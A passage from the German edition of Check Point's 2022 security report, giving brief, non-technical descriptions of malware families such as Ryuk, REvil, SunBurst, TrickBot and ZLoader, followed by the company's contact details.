72CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Ryuk Ryuk ist eine Ransomware, die von TrickBot-Gangs bei gezielten und geplanten Angriffen gegen mehrere Organisationen weltweit eingesetzt wird. Die Ransomware wurde ursprünglich von der Hermes-Ransomware abgeleitet, deren technische Fähigkeiten relativ gering sind und die einen einfachen Dropper und ein unkompliziertes Verschlüsselungsschema umfasst. Dennoch war Ryuk in der Lage, den Zielorganisationen schweren Schaden zuzufügen und sie zu extrem hohen Lösegeldzahlungen in Bitcoin zu zwingen. Im Gegensatz zur meisten Ransomware, die systematisch über massive Spam-Kampagnen und Exploit-Kits verbreitet wird, wird Ryuk ausschließlich für gezielte Angriffe verwendet.

Snake Keylogger Der Snake Keylogger ist ein modularer .NET Keylogger/Infostealer. Es tauchte Ende 2020 auf und wurde unter Cyberkriminellen schnell populär. Snake ist in der Lage, Tastatureingaben aufzuzeichnen, Screenshots zu erstellen, Anmeldedaten und Inhalte der Zwischenablage zu sammeln. Es unterstützt die Exfiltration der gestohlenen Daten sowohl über HTTP- als auch über SMTP-Protokolle.

REvil REvil (aus bekannt als Sodinokibi) ist eine Ransomware-as-a-Service, die ein „Partnerprogramm“ betreibt und 2019 erstmals in freier Wildbahn entdeckt wurde. REvil verschlüsselt Daten im Verzeichnis des Benutzers und löscht Schattenkopien, um die Datenwiederherstellung zu erschweren. Darüber hinaus verwenden die Partner von REvil verschiedene Taktiken, um sie durch Spam und Server-Exploits sowie durch Hacking in Backends von Managed Service Providern (MSPs) und durch Malvertising-Kampagnen zu verbreiten, die an das RIG-Exploit-Kit weitergeleitet werden.

SparrowDoor SparrowDoor ist eine fortschrittliche Backdoor, die von der APT-Gruppe FamousSparrow verwendet wird, um Hotels, Regierungen und andere Einrichtungen auszuspionieren. Sie wurde im März 2021 entdeckt, als sie die Microsoft Exchange ProxyLogon-Schwachstelle ausnutzte. Die Backdoor wird mittels DLL-Hijacking in Kombination mit einer legitimen Binärdatei geladen, um Antivirus-Produkte zu umgehen.

SunBurst SunBurst ist die Hintertür, die im Jahr 2020 in die IT-Management-Software Orion von SolarWinds eingeschleust wurde und Teil des berüchtigten Angriffs auf die Lieferkette war, von dem Tausende von Unternehmen weltweit betroffen waren. Es handelt sich um eine hartnäckige Hintertür, die Angreifern einen ersten Zugang zu den Unternehmen verschafft. Wenn die infizierten Rechner alle Anforderungen erfüllten und keine Dienste oder Antivirus-Software enthielten, die auf einer schwarzen Liste standen, setzte Sunburst zusätzlichen Code im Speicher (wie TearDrop) ab, um die Ausführung von Befehlen zu ermöglichen und die Möglichkeit zu Seitwärtsbewegungen zu schaffen.

73CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Triada Triada, das erstmals 2016 entdeckt wurde, ist eine modulare Hintertür für Android, die Administratorrechte zum Herunterladen weiterer Malware gewährt. Die neueste Version wird über Adware-Entwicklungskits in WhatsApp für Android verbreitet.

Trickbot TrickBot ist ein modularer Banken-Trojaner , der der Cybercrime-Bande WizardSpider zugeschrieben wird. Er wird meist über Spam-Kampagnen oder andere Malware-Familien wie Emotet und BazarLoader verbreitet. TrickBot sendet Informationen über das infizierte System und kann darüber hinaus beliebige Module aus einer Vielzahl von verfügbaren Modulen herunterladen und ausführen, darunter ein VNC-Modul zur Fernsteuerung und ein SMB-Modul zur Verbreitung innerhalb eines kompromittierten Netzwerks. Sobald ein Rechner infiziert ist, nutzten die Bedrohungsakteure hinter dieser Malware, dieses breite Spektrum an Modulen nicht nur, um Bankdaten vom Ziel-PC zu stehlen, sondern auch zur Querverschiebung und Aufklärung über die Zielorganisation selbst, bevor sie einen unternehmensweiten gezielten Ransomware-Angriff durchführen.

Ursnif Ursnif ist eine Variante des Gozi-Banken-Trojaners für Windows, dessen Quellcode online weitergegeben wurde. Er verfügt über Man-in-the-Browser-Fähigkeiten, um Bankinformationen und Zugangsdaten für beliebte Online-Dienste zu stehlen. Darüber hinaus kann er Informationen aus lokalen E-Mail-Clients, Browsern und Kryptowährungs-Brieftaschen stehlen. Schließlich kann er zusätzliche Dateien auf das infizierte System herunterladen und ausführen.

Vidar Vidar ist ein Infostealer, der auf Windows-Betriebssysteme abzielt. Er wurde erstmals Ende 2018 entdeckt und ist darauf ausgelegt, Passwörter, Kreditkartendaten und andere sensible Informationen aus verschiedenen Webbrowsern und digitalen Portemonnaies zu stehlen. Vidar wird in verschiedenen Online-Foren verkauft und als Malware-Dropper zum Download von GandCrab-Ransomware als sekundäre Nutzlast verwendet.

WannaMine WannaMine ist ein hoch entwickelter Monero-Kryptomining-Wurm, der sich mithilfe des EternalBlue-Exploits verbreitet. WannaMine implementiert einen Ausbreitungsmechanismus und Persistenztechniken, indem er permanente Ereignisabonnements für Windows Management Instrumentation (WMI) einsetzt.

74CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

xHelper xHelper ist eine Android-Malware, die hauptsächlich aufdringliche Popup-Werbung und Benachrichtigungs-Spam anzeigt. Nach der Installation ist sie aufgrund ihrer Fähigkeit zur Neuinstallation sehr schwer zu entfernen. Seit diese erstmals im März 2019 entdeckt wurde, hat sie inzwischen über 45.000 Geräte infiziert.

XMRig XMRig ist eine Open-Source-CPU-Mining-Software, die für das Mining von Monero- Kryptowährung verwendet wird. Bedrohungsakteure missbrauchen diese Open- Source-Software häufig durch die Integration in ihre Malware, um illegales Mining auf den Geräten der Opfer durchzuführen.

ZLoader ZLoader ist eine Banken-Malware, die Webinjects verwendet, um Anmeldedaten und vertrauliche Informationen zu stehlen, und die Passwörter und Cookies aus dem Webbrowser des Opfers extrahieren kann. Sie lädt VNC herunter, wodurch sich die Bedrohungsakteure mit dem System des Opfers verbinden und finanzielle Transaktionen vom Gerät des Benutzers aus durchführen können. Der 2016 erstmals gesichtete Trojaner basiert auf durchgesickertem Code der Zeus-Malware aus dem Jahr 2011. Im Jahr 2020 war die Malware bei Bedrohungsakteuren sehr beliebt und enthielt viele neue Varianten.

z0Miner Z0Miner, der erstmals im November 2020 beobachtet wurde, ist ein Kryptominer, der auf Tausenden von Servern gefunden wurde, die von der RCE-Schwachstelle in Oracle WebLogic Server betroffen waren. Die Gruppe, die hinter Z0miner steckt, nutzt seitdem die RCE-Schwachstelle (CVE-2021-26084)in Atlassian Confluence, um weitere Server zu infizieren.

KONTAKTIEREN SIE UNS WELTWEITE ZENTRALE5

5 Ha’Solelim Street, Tel Aviv 67897, Israel Tel: 972-3-753-4555 | Fax: 972-3-624-1100

E-Mail: info@checkpoint.com

U.S. HEADQUARTERS 959 Skyway Road, Suite 300, San Carlos, CA 94070

Tel: 800-429-4391 | 650-628-2000 | Fax: 650-654-4233

WERDEN SIE ANGEGRIFFEN? Kontaktieren Sie unser Incident Response Team:

emergency-response@checkpoint.com

CHECK POINT RESEARCH PODCAST Schalten Sie cp<radio> ein, um Neuigkeiten von CPR sowie

einen Blick hinter die Kulissen und weitere exklusive Inhalte zu erhalten. Besuchen Sie uns unter https://research.checkpoint.com/category/cpradio/

W W W . C H E C K P O I N T . C O M

© 1994-2022 Check Point Software Technologies Ltd. Alle Rechte vorbehalten.

https://research.checkpoint.com/category/cpradio/ http://WWW.CHECKPOINT.COM

CHAPTER 1: INTRODUCTION TO THE CHECK POINT 2022 SECURITY REPORT


Item Type: pdf